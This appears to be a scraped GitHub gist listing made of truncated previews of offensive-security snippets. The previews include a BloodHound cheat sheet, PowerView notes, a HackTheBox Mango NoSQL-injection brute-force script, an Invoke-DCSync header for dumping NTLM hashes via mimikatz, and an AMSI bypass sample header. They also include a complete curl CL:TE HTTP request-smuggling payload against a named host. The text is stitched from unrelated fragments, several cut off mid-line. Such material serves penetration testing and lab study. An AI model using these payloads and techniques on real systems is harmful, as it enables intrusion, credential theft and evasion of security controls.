joeminicucci

DogWhisperer - BloodHound Cypher Cheat Sheet (v2)

Taken from https://raw.githubusercontent.com/SadProcessor/Cheats/master/DogWhispererV2.md

Collection of BloodHound Cypher Query Examples

• I- Raw
• II- Built-In
• III- Custom
• IV- DB Manipulation
• V- REST API (PowerShell)

joeminicucci

import sys

from impacket_rdpcheck import check_rdp as imp_checkrdp
import impacket_rdpcheck_original as imp_checkrdp_orig
from argparse import ArgumentParser
from pypsrp.client import Client
from impacket import tds
from sys import stdout
from os import path
from cme import crackmapexec

joeminicucci

import bz2
import csv
import io
import os
import tarfile
import requests
import argparse
from termcolor import colored

joeminicucci

The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.

The correct way of creating a private frok by duplicating the repo is documented here.

For this assignment the commands are:

1. Create a bare clone of the repository. (This is temporary and will be removed so just do it wherever.)

git clone --bare git@github.com:usi-systems/easytrace.git

joeminicucci

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

joeminicucci

#ippsec's Mango HTB mongo DB brute force script
import requests

def inject(data):
    r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False)
    if r.status_code != 200:
        return True
#can add prefixes to secret to pretext where the brute-force begins
secret = ""
payload = ""

joeminicucci

#CL:TE -- Standard CL and TE
    curl -i -s -k  -X $'POST' \
    -H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
    --data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
    $'https://subdomain1.j

joeminicucci

'##################################################################################
' Code samples for AMSI bypass techniques 
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################



' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)  
' ##################################################################################

joeminicucci

function Invoke-DCSync
{
<#
.SYNOPSIS

Uses dcsync from mimikatz to collect NTLM hashes from the domain.

Author: @monoxgas
Improved by: @harmj0y

joeminicucci

# From https://wald0.com/?p=14
# Requires PowerView

$Graph = @()
$Infinity = [int]::MaxValue
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname }
$Nodes += Get-NetComputer

ForEach($Node in $Nodes){
	$Vertex = New-Object PSObject